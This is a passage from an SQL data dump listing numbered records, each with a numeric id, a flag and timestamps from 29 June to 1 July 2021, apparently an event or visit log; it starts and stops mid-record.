12:30:58'),(25975,1778,1,'2021-06-29','2021-06-29 12:49:08'),(25976,2159,1,'2021-06-29','2021-06-29 12:51:17'),(25977,472,1,'2021-06-29','2021-06-29 13:15:21'),(25978,2309,1,'2021-06-29','2021-06-29 13:23:59'),(25979,2309,1,'2021-06-29','2021-06-29 13:24:31'),(25980,1612,1,'2021-06-29','2021-06-29 13:32:51'),(25981,3023,1,'2021-06-29','2021-06-29 14:01:40'),(25982,1602,1,'2021-06-29','2021-06-29 14:06:30'),(25983,1730,1,'2021-06-29','2021-06-29 14:06:56'),(25984,1602,1,'2021-06-29','2021-06-29 14:09:05'),(25985,1734,1,'2021-06-29','2021-06-29 14:14:28'),(25986,1697,1,'2021-06-29','2021-06-29 14:32:01'),(25987,3265,1,'2021-06-29','2021-06-29 14:45:17'),(25988,1718,1,'2021-06-29','2021-06-29 14:49:01'),(25989,110,1,'2021-06-29','2021-06-29 14:51:57'),(25990,1602,1,'2021-06-29','2021-06-29 15:27:37'),(25991,91,1,'2021-06-29','2021-06-29 15:30:13'),(25992,3066,1,'2021-06-29','2021-06-29 15:33:50'),(25993,2296,1,'2021-06-29','2021-06-29 15:40:24'),(25994,1602,1,'2021-06-29','2021-06-29 15:55:14'),(25995,1720,1,'2021-06-29','2021-06-29 16:11:40'),(25996,1720,1,'2021-06-29','2021-06-29 16:22:10'),(25997,91,1,'2021-06-29','2021-06-29 17:50:10'),(25998,3056,1,'2021-06-29','2021-06-29 18:10:27'),(25999,3280,1,'2021-06-29','2021-06-29 18:18:42'),(26000,1718,1,'2021-06-29','2021-06-29 18:20:36'),(26001,87,1,'2021-06-29','2021-06-29 18:29:08'),(26002,87,1,'2021-06-29','2021-06-29 18:29:13'),(26003,473,1,'2021-06-29','2021-06-29 18:30:08'),(26004,87,1,'2021-06-29','2021-06-29 18:30:27'),(26005,91,1,'2021-06-29','2021-06-29 18:32:11'),(26006,91,1,'2021-06-29','2021-06-29 18:32:21'),(26007,3102,1,'2021-06-29','2021-06-29 18:34:54'),(26008,3102,1,'2021-06-29','2021-06-29 18:34:54'),(26009,1724,1,'2021-06-29','2021-06-29 18:37:39'),(26010,1724,1,'2021-06-29','2021-06-29 18:37:40'),(26011,2457,1,'2021-06-29','2021-06-29 18:39:06'),(26012,2904,1,'2021-06-29','2021-06-29 18:47:18'),(26013,471,1,'2021-06-29','2021-06-29 19:00:26'),(26014,3102,1,'2021-06-29','2021-06-29 19:03:18'),(26015,1713,1,'2021-06-29','2021-06-29 19:11:16'),(26016,1588,1,'2021-06-29','2021-06-29 19:42:34'),(26017,3107,1,'2021-06-29','2021-06-29 19:59:08'),(26018,3030,1,'2021-06-29','2021-06-29 20:30:42'),(26019,1614,1,'2021-06-29','2021-06-29 20:32:10'),(26020,1782,1,'2021-06-29','2021-06-29 21:00:36'),(26021,1782,1,'2021-06-29','2021-06-29 21:00:41'),(26022,2503,1,'2021-06-29','2021-06-29 21:31:54'),(26023,3038,1,'2021-06-29','2021-06-29 21:45:57'),(26024,1602,1,'2021-06-29','2021-06-29 21:47:17'),(26025,478,1,'2021-06-29','2021-06-29 21:50:45'),(26026,3269,1,'2021-06-29','2021-06-29 21:59:29'),(26027,3030,1,'2021-06-29','2021-06-29 22:11:33'),(26028,1602,1,'2021-06-29','2021-06-29 23:10:46'),(26029,1602,1,'2021-06-29','2021-06-29 23:12:31'),(26030,1720,1,'2021-06-29','2021-06-29 23:14:41'),(26031,3038,1,'2021-06-29','2021-06-29 23:21:31'),(26032,1602,1,'2021-06-29','2021-06-29 23:22:03'),(26033,1602,1,'2021-06-29','2021-06-29 23:29:44'),(26034,1602,1,'2021-06-29','2021-06-29 23:55:18'),(26035,1602,1,'2021-06-30','2021-06-30 00:13:01'),(26036,84,1,'2021-06-30','2021-06-30 00:14:37'),(26037,1872,1,'2021-06-30','2021-06-30 00:14:50'),(26038,84,1,'2021-06-30','2021-06-30 00:15:10'),(26039,1872,1,'2021-06-30','2021-06-30 00:15:33'),(26040,84,1,'2021-06-30','2021-06-30 00:15:57'),(26041,1872,1,'2021-06-30','2021-06-30 00:16:20'),(26042,84,1,'2021-06-30','2021-06-30 00:16:24'),(26043,1602,1,'2021-06-30','2021-06-30 00:16:27'),(26044,2503,1,'2021-06-30','2021-06-30 00:50:50'),(26045,1602,1,'2021-06-30','2021-06-30 01:05:17'),(26046,76,1,'2021-06-30','2021-06-30 01:43:30'),(26047,2457,1,'2021-06-30','2021-06-30 02:10:55'),(26048,1697,1,'2021-06-30','2021-06-30 03:26:43'),(26049,2609,1,'2021-06-30','2021-06-30 03:46:10'),(26050,2617,1,'2021-06-30','2021-06-30 03:56:08'),(26051,76,1,'2021-06-30','2021-06-30 04:05:24'),(26052,68,1,'2021-06-30','2021-06-30 04:05:29'),(26053,3534,1,'2021-06-30','2021-06-30 04:06:11'),(26054,1592,1,'2021-06-30','2021-06-30 04:16:01'),(26055,3691,1,'2021-06-30','2021-06-30 04:17:39'),(26056,570,1,'2021-06-30','2021-06-30 04:26:07'),(26057,2804,1,'2021-06-30','2021-06-30 04:26:09'),(26058,1768,1,'2021-06-30','2021-06-30 04:26:12'),(26059,2804,1,'2021-06-30','2021-06-30 04:26:15'),(26060,1598,1,'2021-06-30','2021-06-30 04:34:45'),(26061,91,1,'2021-06-30','2021-06-30 04:35:08'),(26062,1586,1,'2021-06-30','2021-06-30 04:36:15'),(26063,1600,1,'2021-06-30','2021-06-30 04:49:19'),(26064,2309,1,'2021-06-30','2021-06-30 04:53:43'),(26065,1592,1,'2021-06-30','2021-06-30 04:56:45'),(26066,1600,1,'2021-06-30','2021-06-30 04:59:35'),(26067,1588,1,'2021-06-30','2021-06-30 05:06:51'),(26068,482,1,'2021-06-30','2021-06-30 05:16:52'),(26069,2704,1,'2021-06-30','2021-06-30 05:47:49'),(26070,1602,1,'2021-06-30','2021-06-30 05:48:19'),(26071,1588,1,'2021-06-30','2021-06-30 05:57:18'),(26072,74,1,'2021-06-30','2021-06-30 05:57:24'),(26073,1598,1,'2021-06-30','2021-06-30 06:01:01'),(26074,3313,1,'2021-06-30','2021-06-30 06:06:56'),(26075,2769,1,'2021-06-30','2021-06-30 06:07:05'),(26076,2813,1,'2021-06-30','2021-06-30 06:10:13'),(26077,1604,1,'2021-06-30','2021-06-30 06:17:01'),(26078,2309,1,'2021-06-30','2021-06-30 06:21:00'),(26079,1582,1,'2021-06-30','2021-06-30 06:27:11'),(26080,1594,1,'2021-06-30','2021-06-30 06:27:33'),(26081,1594,1,'2021-06-30','2021-06-30 06:30:13'),(26082,80,1,'2021-06-30','2021-06-30 06:38:09'),(26083,1602,1,'2021-06-30','2021-06-30 06:38:42'),(26084,3307,1,'2021-06-30','2021-06-30 06:40:41'),(26085,1594,1,'2021-06-30','2021-06-30 06:55:03'),(26086,2904,1,'2021-06-30','2021-06-30 06:55:37'),(26087,2904,1,'2021-06-30','2021-06-30 06:57:32'),(26088,1718,1,'2021-06-30','2021-06-30 07:07:41'),(26089,472,1,'2021-06-30','2021-06-30 07:10:31'),(26090,1594,1,'2021-06-30','2021-06-30 07:10:31'),(26091,2904,1,'2021-06-30','2021-06-30 07:14:26'),(26092,2904,1,'2021-06-30','2021-06-30 07:17:35'),(26093,570,1,'2021-06-30','2021-06-30 07:17:54'),(26094,1596,1,'2021-06-30','2021-06-30 07:20:39'),(26095,76,1,'2021-06-30','2021-06-30 07:24:30'),(26096,1596,1,'2021-06-30','2021-06-30 07:29:56'),(26097,3749,1,'2021-06-30','2021-06-30 07:31:18'),(26098,3038,1,'2021-06-30','2021-06-30 07:31:25'),(26099,3749,1,'2021-06-30','2021-06-30 07:31:41'),(26100,3673,1,'2021-06-30','2021-06-30 07:32:07'),(26101,1718,1,'2021-06-30','2021-06-30 07:37:45'),(26102,1614,1,'2021-06-30','2021-06-30 07:40:26'),(26103,1582,1,'2021-06-30','2021-06-30 07:48:47'),(26104,1766,1,'2021-06-30','2021-06-30 07:52:57'),(26105,1747,1,'2021-06-30','2021-06-30 07:57:42'),(26106,2769,1,'2021-06-30','2021-06-30 07:57:44'),(26107,3127,1,'2021-06-30','2021-06-30 08:07:56'),(26108,1610,1,'2021-06-30','2021-06-30 08:10:34'),(26109,469,1,'2021-06-30','2021-06-30 08:17:49'),(26110,1594,1,'2021-06-30','2021-06-30 08:19:59'),(26111,3486,1,'2021-06-30','2021-06-30 08:28:01'),(26112,2419,1,'2021-06-30','2021-06-30 08:28:10'),(26113,473,1,'2021-06-30','2021-06-30 08:38:01'),(26114,1749,1,'2021-06-30','2021-06-30 08:38:12'),(26115,2751,1,'2021-06-30','2021-06-30 08:40:48'),(26116,1718,1,'2021-06-30','2021-06-30 08:40:51'),(26117,468,1,'2021-06-30','2021-06-30 08:50:11'),(26118,2508,1,'2021-06-30','2021-06-30 08:51:27'),(26119,2558,1,'2021-06-30','2021-06-30 08:59:09'),(26120,2775,1,'2021-06-30','2021-06-30 09:01:05'),(26121,2911,1,'2021-06-30','2021-06-30 09:02:41'),(26122,1612,1,'2021-06-30','2021-06-30 09:08:46'),(26123,3307,1,'2021-06-30','2021-06-30 09:08:49'),(26124,2410,1,'2021-06-30','2021-06-30 09:18:34'),(26125,1734,1,'2021-06-30','2021-06-30 09:20:42'),(26126,1602,1,'2021-06-30','2021-06-30 09:21:13'),(26127,3498,1,'2021-06-30','2021-06-30 09:28:37'),(26128,3721,1,'2021-06-30','2021-06-30 09:37:37'),(26129,3251,1,'2021-06-30','2021-06-30 09:38:45'),(26130,1745,1,'2021-06-30','2021-06-30 09:48:57'),(26131,2809,1,'2021-06-30','2021-06-30 09:48:59'),(26132,84,1,'2021-06-30','2021-06-30 10:01:41'),(26133,2704,1,'2021-06-30','2021-06-30 10:01:47'),(26134,91,1,'2021-06-30','2021-06-30 10:09:23'),(26135,1745,1,'2021-06-30','2021-06-30 10:10:25'),(26136,3109,1,'2021-06-30','2021-06-30 10:12:35'),(26137,3109,1,'2021-06-30','2021-06-30 10:12:56'),(26138,2156,1,'2021-06-30','2021-06-30 10:18:45'),(26139,476,1,'2021-06-30','2021-06-30 10:21:35'),(26140,3104,1,'2021-06-30','2021-06-30 10:22:45'),(26141,2801,1,'2021-06-30','2021-06-30 10:28:35'),(26142,3107,1,'2021-06-30','2021-06-30 10:28:40'),(26143,3069,1,'2021-06-30','2021-06-30 10:29:46'),(26144,3005,1,'2021-06-30','2021-06-30 10:30:07'),(26145,473,1,'2021-06-30','2021-06-30 10:39:40'),(26146,1774,1,'2021-06-30','2021-06-30 10:44:51'),(26147,3083,1,'2021-06-30','2021-06-30 10:48:53'),(26148,472,1,'2021-06-30','2021-06-30 10:51:24'),(26149,68,1,'2021-06-30','2021-06-30 10:52:59'),(26150,1872,1,'2021-06-30','2021-06-30 10:58:50'),(26151,3259,1,'2021-06-30','2021-06-30 10:59:40'),(26152,3102,1,'2021-06-30','2021-06-30 11:02:20'),(26153,1612,1,'2021-06-30','2021-06-30 11:06:48'),(26154,477,1,'2021-06-30','2021-06-30 11:09:16'),(26155,2309,1,'2021-06-30','2021-06-30 11:15:08'),(26156,3430,1,'2021-06-30','2021-06-30 11:16:20'),(26157,2178,1,'2021-06-30','2021-06-30 11:19:23'),(26158,2989,1,'2021-06-30','2021-06-30 11:20:23'),(26159,2748,1,'2021-06-30','2021-06-30 11:25:35'),(26160,1774,1,'2021-06-30','2021-06-30 11:26:41'),(26161,335,1,'2021-06-30','2021-06-30 11:27:39'),(26162,3714,1,'2021-06-30','2021-06-30 11:29:10'),(26163,1612,1,'2021-06-30','2021-06-30 11:29:29'),(26164,3045,1,'2021-06-30','2021-06-30 11:32:57'),(26165,1877,1,'2021-06-30','2021-06-30 11:33:07'),(26166,2991,1,'2021-06-30','2021-06-30 11:34:44'),(26167,2457,1,'2021-06-30','2021-06-30 11:45:33'),(26168,3710,1,'2021-06-30','2021-06-30 11:50:09'),(26169,3045,1,'2021-06-30','2021-06-30 11:52:26'),(26170,1770,1,'2021-06-30','2021-06-30 11:54:08'),(26171,80,1,'2021-06-30','2021-06-30 11:57:21'),(26172,1770,1,'2021-06-30','2021-06-30 11:58:50'),(26173,3313,1,'2021-06-30','2021-06-30 12:03:10'),(26174,2148,1,'2021-06-30','2021-06-30 12:04:18'),(26175,2395,1,'2021-06-30','2021-06-30 12:06:38'),(26176,1780,1,'2021-06-30','2021-06-30 12:06:50'),(26177,2148,1,'2021-06-30','2021-06-30 12:12:35'),(26178,2609,1,'2021-06-30','2021-06-30 12:12:58'),(26179,570,1,'2021-06-30','2021-06-30 12:15:33'),(26180,76,1,'2021-06-30','2021-06-30 12:17:00'),(26181,2165,1,'2021-06-30','2021-06-30 12:25:27'),(26182,2813,1,'2021-06-30','2021-06-30 12:34:42'),(26183,3045,1,'2021-06-30','2021-06-30 12:34:43'),(26184,1614,1,'2021-06-30','2021-06-30 12:36:47'),(26185,2904,1,'2021-06-30','2021-06-30 12:42:20'),(26186,2809,1,'2021-06-30','2021-06-30 12:43:00'),(26187,3285,1,'2021-06-30','2021-06-30 12:46:55'),(26188,1592,1,'2021-06-30','2021-06-30 12:53:58'),(26189,1586,1,'2021-06-30','2021-06-30 12:55:08'),(26190,3691,1,'2021-06-30','2021-06-30 12:57:13'),(26191,3226,1,'2021-06-30','2021-06-30 13:04:35'),(26192,1588,1,'2021-06-30','2021-06-30 13:05:46'),(26193,91,1,'2021-06-30','2021-06-30 13:06:01'),(26194,3674,1,'2021-06-30','2021-06-30 13:06:40'),(26195,1588,1,'2021-06-30','2021-06-30 13:06:58'),(26196,80,1,'2021-06-30','2021-06-30 13:07:57'),(26197,2971,1,'2021-06-30','2021-06-30 13:10:54'),(26198,3109,1,'2021-06-30','2021-06-30 13:23:06'),(26199,1724,1,'2021-06-30','2021-06-30 13:23:25'),(26200,1592,1,'2021-06-30','2021-06-30 13:27:39'),(26201,3271,1,'2021-06-30','2021-06-30 13:36:47'),(26202,3278,1,'2021-06-30','2021-06-30 13:37:22'),(26203,480,1,'2021-06-30','2021-06-30 13:41:17'),(26204,1594,1,'2021-06-30','2021-06-30 13:42:07'),(26205,1741,1,'2021-06-30','2021-06-30 13:46:36'),(26206,2410,1,'2021-06-30','2021-06-30 13:53:38'),(26207,3498,1,'2021-06-30','2021-06-30 13:54:57'),(26208,3243,1,'2021-06-30','2021-06-30 14:03:32'),(26209,1600,1,'2021-06-30','2021-06-30 14:14:04'),(26210,3691,1,'2021-06-30','2021-06-30 14:17:53'),(26211,1602,1,'2021-06-30','2021-06-30 14:24:29'),(26212,2297,1,'2021-06-30','2021-06-30 14:24:47'),(26213,91,1,'2021-06-30','2021-06-30 14:25:01'),(26214,2297,1,'2021-06-30','2021-06-30 14:25:19'),(26215,1600,1,'2021-06-30','2021-06-30 14:25:37'),(26216,1588,1,'2021-06-30','2021-06-30 14:26:41'),(26217,3534,1,'2021-06-30','2021-06-30 14:27:34'),(26218,1745,1,'2021-06-30','2021-06-30 14:27:46'),(26219,1600,1,'2021-06-30','2021-06-30 14:29:24'),(26220,1772,1,'2021-06-30','2021-06-30 14:29:45'),(26221,1602,1,'2021-06-30','2021-06-30 14:45:49'),(26222,2309,1,'2021-06-30','2021-06-30 14:47:05'),(26223,2904,1,'2021-06-30','2021-06-30 14:53:09'),(26224,1604,1,'2021-06-30','2021-06-30 14:54:23'),(26225,1582,1,'2021-06-30','2021-06-30 14:54:28'),(26226,1602,1,'2021-06-30','2021-06-30 14:57:27'),(26227,1602,1,'2021-06-30','2021-06-30 14:57:31'),(26228,1602,1,'2021-06-30','2021-06-30 14:57:31'),(26229,3307,1,'2021-06-30','2021-06-30 14:57:53'),(26230,1602,1,'2021-06-30','2021-06-30 14:58:10'),(26231,1734,1,'2021-06-30','2021-06-30 14:58:52'),(26232,1734,1,'2021-06-30','2021-06-30 14:58:54'),(26233,3694,1,'2021-06-30','2021-06-30 15:03:22'),(26234,1600,1,'2021-06-30','2021-06-30 15:04:16'),(26235,2704,1,'2021-06-30','2021-06-30 15:04:40'),(26236,2769,1,'2021-06-30','2021-06-30 15:14:27'),(26237,1598,1,'2021-06-30','2021-06-30 15:14:30'),(26238,1594,1,'2021-06-30','2021-06-30 15:24:53'),(26239,3313,1,'2021-06-30','2021-06-30 15:25:15'),(26240,3247,1,'2021-06-30','2021-06-30 15:29:15'),(26241,80,1,'2021-06-30','2021-06-30 15:35:01'),(26242,2813,1,'2021-06-30','2021-06-30 15:35:37'),(26243,2704,1,'2021-06-30','2021-06-30 15:38:30'),(26244,2704,1,'2021-06-30','2021-06-30 15:39:25'),(26245,2704,1,'2021-06-30','2021-06-30 15:39:57'),(26246,3541,1,'2021-06-30','2021-06-30 15:47:42'),(26247,1774,1,'2021-06-30','2021-06-30 15:50:54'),(26248,472,1,'2021-06-30','2021-06-30 16:14:59'),(26249,1596,1,'2021-06-30','2021-06-30 16:15:43'),(26250,1614,1,'2021-06-30','2021-06-30 16:31:43'),(26251,1718,1,'2021-06-30','2021-06-30 16:35:24'),(26252,1614,1,'2021-06-30','2021-06-30 16:52:29'),(26253,2609,1,'2021-06-30','2021-06-30 16:52:53'),(26254,1766,1,'2021-06-30','2021-06-30 16:55:42'),(26255,2769,1,'2021-06-30','2021-06-30 17:02:25'),(26256,469,1,'2021-06-30','2021-06-30 17:02:34'),(26257,3489,1,'2021-06-30','2021-06-30 17:25:01'),(26258,1604,1,'2021-06-30','2021-06-30 17:25:48'),(26259,1594,1,'2021-06-30','2021-06-30 17:27:03'),(26260,2161,1,'2021-06-30','2021-06-30 17:29:42'),(26261,1749,1,'2021-06-30','2021-06-30 17:30:36'),(26262,1747,1,'2021-06-30','2021-06-30 17:34:01'),(26263,1747,1,'2021-06-30','2021-06-30 17:35:24'),(26264,3486,1,'2021-06-30','2021-06-30 17:49:29'),(26265,1610,1,'2021-06-30','2021-06-30 17:49:34'),(26266,3257,1,'2021-06-30','2021-06-30 17:50:56'),(26267,3127,1,'2021-06-30','2021-06-30 17:55:12'),(26268,469,1,'2021-06-30','2021-06-30 17:56:04'),(26269,3746,1,'2021-06-30','2021-06-30 17:58:39'),(26270,91,1,'2021-06-30','2021-06-30 18:04:42'),(26271,2419,1,'2021-06-30','2021-06-30 18:05:53'),(26272,2419,1,'2021-06-30','2021-06-30 18:05:56'),(26273,2751,1,'2021-06-30','2021-06-30 18:05:58'),(26274,3038,1,'2021-06-30','2021-06-30 18:09:19'),(26275,91,1,'2021-06-30','2021-06-30 18:10:10'),(26276,1751,1,'2021-06-30','2021-06-30 18:10:48'),(26277,3087,1,'2021-06-30','2021-06-30 18:12:29'),(26278,2751,1,'2021-06-30','2021-06-30 18:16:21'),(26279,484,1,'2021-06-30','2021-06-30 18:16:33'),(26280,3727,1,'2021-06-30','2021-06-30 18:17:25'),(26281,1612,1,'2021-06-30','2021-06-30 18:17:55'),(26282,1610,1,'2021-06-30','2021-06-30 18:21:44'),(26283,3498,1,'2021-06-30','2021-06-30 18:25:10'),(26284,2558,1,'2021-06-30','2021-06-30 18:26:35'),(26285,3251,1,'2021-06-30','2021-06-30 18:28:35'),(26286,3307,1,'2021-06-30','2021-06-30 18:38:05'),(26287,1606,1,'2021-06-30','2021-06-30 18:38:28'),(26288,68,1,'2021-06-30','2021-06-30 18:39:30'),(26289,1606,1,'2021-06-30','2021-06-30 18:39:59'),(26290,1606,1,'2021-06-30','2021-06-30 18:40:32'),(26291,1606,1,'2021-06-30','2021-06-30 18:41:51'),(26292,468,1,'2021-06-30','2021-06-30 18:45:30'),(26293,2410,1,'2021-06-30','2021-06-30 18:46:38'),(26294,2775,1,'2021-06-30','2021-06-30 18:55:56'),(26295,3104,1,'2021-06-30','2021-06-30 18:57:10'),(26296,91,1,'2021-06-30','2021-06-30 19:02:55'),(26297,91,1,'2021-06-30','2021-06-30 19:06:32'),(26298,1608,1,'2021-06-30','2021-06-30 19:12:34'),(26299,2617,1,'2021-06-30','2021-06-30 19:15:52'),(26300,2178,1,'2021-06-30','2021-06-30 19:16:09'),(26301,2904,1,'2021-06-30','2021-06-30 19:18:07'),(26302,470,1,'2021-06-30','2021-06-30 19:18:31'),(26303,84,1,'2021-06-30','2021-06-30 19:20:08'),(26304,91,1,'2021-06-30','2021-06-30 19:20:34'),(26305,1610,1,'2021-06-30','2021-06-30 19:25:47'),(26306,3175,1,'2021-06-30','2021-06-30 19:26:32'),(26307,108,1,'2021-06-30','2021-06-30 19:27:20'),(26308,68,1,'2021-06-30','2021-06-30 19:27:49'),(26309,2911,1,'2021-06-30','2021-06-30 19:33:43'),(26310,470,1,'2021-06-30','2021-06-30 19:45:27'),(26311,2156,1,'2021-06-30','2021-06-30 19:45:43'),(26312,1766,1,'2021-06-30','2021-06-30 19:46:21'),(26313,3063,1,'2021-06-30','2021-06-30 19:48:20'),(26314,3287,1,'2021-06-30','2021-06-30 19:48:21'),(26315,472,1,'2021-06-30','2021-06-30 20:06:06'),(26316,2658,1,'2021-06-30','2021-06-30 20:07:45'),(26317,80,1,'2021-06-30','2021-06-30 20:08:39'),(26318,1608,1,'2021-06-30','2021-06-30 20:12:21'),(26319,2178,1,'2021-06-30','2021-06-30 20:15:57'),(26320,477,1,'2021-06-30','2021-06-30 20:16:41'),(26321,2159,1,'2021-06-30','2021-06-30 20:23:07'),(26322,473,1,'2021-06-30','2021-06-30 20:33:21'),(26323,3099,1,'2021-06-30','2021-06-30 20:35:54'),(26324,1747,1,'2021-06-30','2021-06-30 20:46:00'),(26325,1877,1,'2021-06-30','2021-06-30 20:56:54'),(26326,1612,1,'2021-06-30','2021-06-30 21:01:02'),(26327,468,1,'2021-06-30','2021-06-30 21:06:14'),(26328,3053,1,'2021-06-30','2021-06-30 21:06:28'),(26329,3053,1,'2021-06-30','2021-06-30 21:07:17'),(26330,3486,1,'2021-06-30','2021-06-30 21:09:03'),(26331,3181,1,'2021-06-30','2021-06-30 21:16:22'),(26332,1614,1,'2021-06-30','2021-06-30 21:27:06'),(26333,1586,1,'2021-06-30','2021-06-30 21:29:28'),(26334,2148,1,'2021-06-30','2021-06-30 21:38:54'),(26335,1592,1,'2021-06-30','2021-06-30 21:46:41'),(26336,1600,1,'2021-06-30','2021-06-30 21:49:29'),(26337,2813,1,'2021-06-30','2021-06-30 21:55:55'),(26338,2809,1,'2021-06-30','2021-06-30 21:56:07'),(26339,3045,1,'2021-06-30','2021-06-30 21:58:51'),(26340,3023,1,'2021-06-30','2021-06-30 22:06:11'),(26341,335,1,'2021-06-30','2021-06-30 22:08:56'),(26342,3109,1,'2021-06-30','2021-06-30 22:16:26'),(26343,2296,1,'2021-06-30','2021-06-30 22:19:20'),(26344,2410,1,'2021-06-30','2021-06-30 22:36:51'),(26345,3282,1,'2021-06-30','2021-06-30 22:37:49'),(26346,3226,1,'2021-06-30','2021-06-30 22:40:31'),(26347,2063,1,'2021-06-30','2021-06-30 22:47:16'),(26348,3083,1,'2021-06-30','2021-06-30 22:47:27'),(26349,3107,1,'2021-06-30','2021-06-30 22:49:58'),(26350,2804,1,'2021-06-30','2021-06-30 22:56:43'),(26351,2934,1,'2021-06-30','2021-06-30 22:59:11'),(26352,3117,1,'2021-06-30','2021-06-30 23:01:42'),(26353,476,1,'2021-06-30','2021-06-30 23:06:35'),(26354,1602,1,'2021-06-30','2021-06-30 23:17:24'),(26355,2309,1,'2021-06-30','2021-06-30 23:18:48'),(26356,3005,1,'2021-06-30','2021-06-30 23:19:48'),(26357,2309,1,'2021-06-30','2021-06-30 23:29:30'),(26358,1588,1,'2021-06-30','2021-06-30 23:36:48'),(26359,1598,1,'2021-06-30','2021-06-30 23:36:52'),(26360,3259,1,'2021-06-30','2021-06-30 23:38:09'),(26361,3534,1,'2021-06-30','2021-06-30 23:40:02'),(26362,1586,1,'2021-06-30','2021-06-30 23:59:44'),(26363,2156,1,'2021-07-01','2021-07-01 00:06:06'),(26364,1588,1,'2021-07-01','2021-07-01 00:06:42'),(26365,1602,1,'2021-07-01','2021-07-01 00:08:57'),(26366,3243,1,'2021-07-01','2021-07-01 00:09:31'),(26367,3313,1,'2021-07-01','2021-07-01 00:26:56'),(26368,80,1,'2021-07-01','2021-07-01 00:30:55'),(26369,80,1,'2021-07-01','2021-07-01 00:31:25'),(26370,2704,1,'2021-07-01','2021-07-01 00:37:18'),(26371,1582,1,'2021-07-01','2021-07-01 00:37:44'),(26372,2769,1,'2021-07-01','2021-07-01 00:40:30'),(26373,2420,1,'2021-07-01','2021-07-01 00:45:20'),(26374,1604,1,'2021-07-01','2021-07-01 00:47:06'),(26375,1594,1,'2021-07-01','2021-07-01 00:49:56'),(26376,1594,1,'2021-07-01','2021-07-01 00:50:01'),(26377,1594,1,'2021-07-01','2021-07-01 00:50:43'),(26378,3307,1,'2021-07-01','2021-07-01 00:50:48'),(26379,3479,1,'2021-07-01','2021-07-01 00:54:12'),(26380,2704,1,'2021-07-01','2021-07-01 00:57:03'),(26381,1582,1,'2021-07-01','2021-07-01 00:59:05'),(26382,1596,1,'2021-07-01','2021-07-01 01:07:14'),(26383,472,1,'2021-07-01','2021-07-01 01:10:00'),(26384,1594,1,'2021-07-01','2021-07-01 01:15:03'),(26385,2813,1,'2021-07-01','2021-07-01 01:17:26'),(26386,1718,1,'2021-07-01','2021-07-01 01:21:12'),(26387,1596,1,'2021-07-01','2021-07-01 01:27:27'),(26388,76,1,'2021-07-01','2021-07-01 01:27:49'),(26389,3034,1,'2021-07-01','2021-07-01 01:30:42'),(26390,3055,1,'2021-07-01','2021-07-01 01:32:28'),(26391,1594,1,'2021-07-01','2021-07-01 01:38:29'),(26392,2751,1,'2021-07-01','2021-07-01 01:39:39'),(26393,2989,1,'2021-07-01','2021-07-01 01:47:23'),(26394,479,1,'2021-07-01','2021-07-01 01:48:03'),(26395,1770,1,'2021-07-01','2021-07-01 01:50:19'),(26396,1604,1,'2021-07-01','2021-07-01 01:57:53'),(26397,1774,1,'2021-07-01','2021-07-01 02:07:50'),(26398,1745,1,'2021-07-01','2021-07-01 02:10:13'),(26399,469,1,'2021-07-01','2021-07-01 02:22:24'),(26400,1718,1,'2021-07-01','2021-07-01 02:26:59'),(26401,2609,1,'2021-07-01','2021-07-01 02:27:54'),(26402,2769,1,'2021-07-01','2021-07-01 02:30:31'),(26403,1614,1,'2021-07-01','2021-07-01 02:30:43'),(26404,1747,1,'2021-07-01','2021-07-01 02:37:28'),(26405,1749,1,'2021-07-01','2021-07-01 02:37:44'),(26406,469,1,'2021-07-01','2021-07-01 02:41:34'),(26407,1584,1,'2021-07-01','2021-07-01 02:45:51'),(26408,1770,1,'2021-07-01','2021-07-01 02:47:31'),(26409,1728,1,'2021-07-01','2021-07-01 02:48:34'),(26410,3707,1,'2021-07-01','2021-07-01 02:58:48'),(26411,3731,1,'2021-07-01','2021-07-01 03:00:47'),(26412,1602,1,'2021-07-01','2021-07-01 03:01:27'),(26413,1602,1,'2021-07-01','2021-07-01 03:16:25'),(26414,2809,1,'2021-07-01','2021-07-01 03:17:26'),(26415,1602,1,'2021-07-01','2021-07-01 03:19:17'),(26416,1737,1,'2021-07-01','2021-07-01 03:20:50'),(26417,3498,1,'2021-07-01','2021-07-01 03:20:58'),(26418,1715,1,'2021-07-01','2021-07-01 03:21:43'),(26419,2419,1,'2021-07-01','2021-07-01 03:25:26'),(26420,468,1,'2021-07-01','2021-07-01 03:28:05'),(26421,2775,1,'2021-07-01','2021-07-01 03:29:39'),(26422,1602,1,'2021-07-01','2021-07-01 03:31:42'),(26423,1734,1,'2021-07-01','2021-07-01 03:37:15'),(26424,2410,1,'2021-07-01','2021-07-01 03:38:11'),(26425,3307,1,'2021-07-01','2021-07-01 03:39:07'),(26426,1610,1,'2021-07-01','2021-07-01 03:49:11'),(26427,3486,1,'2021-07-01','2021-07-01 03:49:23'),(26428,68,1,'2021-07-01','2021-07-01 03:50:56'),(26429,1602,1,'2021-07-01','2021-07-01 03:51:31'),(26430,2911,1,'2021-07-01','2021-07-01 03:55:27'),(26431,3127,1,'2021-07-01','2021-07-01 03:57:59'),(26432,3746,1,'2021-07-01','2021-07-01 03:58:11'),(26433,1602,1,'2021-07-01','2021-07-01 04:05:09'),(26434,1602,1,'2021-07-01','2021-07-01 04:05:17'),(26435,3251,1,'2021-07-01','2021-07-01 04:08:28'),(26436,1610,1,'2021-07-01','2021-07-01 04:10:54'),(26437,2558,1,'2021-07-01','2021-07-01 04:11:12'),(26438,2617,1,'2021-07-01','2021-07-01 04:19:01'),(26439,470,1,'2021-07-01','2021-07-01 04:21:31'),(26440,3099,1,'2021-07-01','2021-07-01 04:28:52'),(26441,3107,1,'2021-07-01','2021-07-01 04:30:10'),(26442,1730,1,'2021-07-01','2021-07-01 04:31:06'),(26443,1734,1,'2021-07-01','2021-07-01 04:38:24'),(26444,1718,1,'2021-07-01','2021-07-01 04:38:37'),(26445,2658,1,'2021-07-01','2021-07-01 04:41:14'),(26446,1877,1,'2021-07-01','2021-07-01 04:50:24'),(26447,3430,1,'2021-07-01','2021-07-01 04:51:01'),(26448,471,1,'2021-07-01','2021-07-01 04:51:27'),(26449,3489,1,'2021-07-01','2021-07-01 04:59:28'),(26450,1782,1,'2021-07-01','2021-07-01 04:59:55'),(26451,84,1,'2021-07-01','2021-07-01 05:01:24'),(26452,1766,1,'2021-07-01','2021-07-01 05:08:43'),(26453,473,1,'2021-07-01','2021-07-01 05:18:50'),(26454,1612,1,'2021-07-01','2021-07-01 05:19:07'),(26455,2178,1,'2021-07-01','2021-07-01 05:21:23'),(26456,477,1,'2021-07-01','2021-07-01 05:41:33'),(26457,1877,1,'2021-07-01','2021-07-01 05:48:52'),(26458,2617,1,'2021-07-01','2021-07-01 05:59:00'),(26459,3226,1,'2021-07-01','2021-07-01 06:03:40'),(26460,3104,1,'2021-07-01','2021-07-01 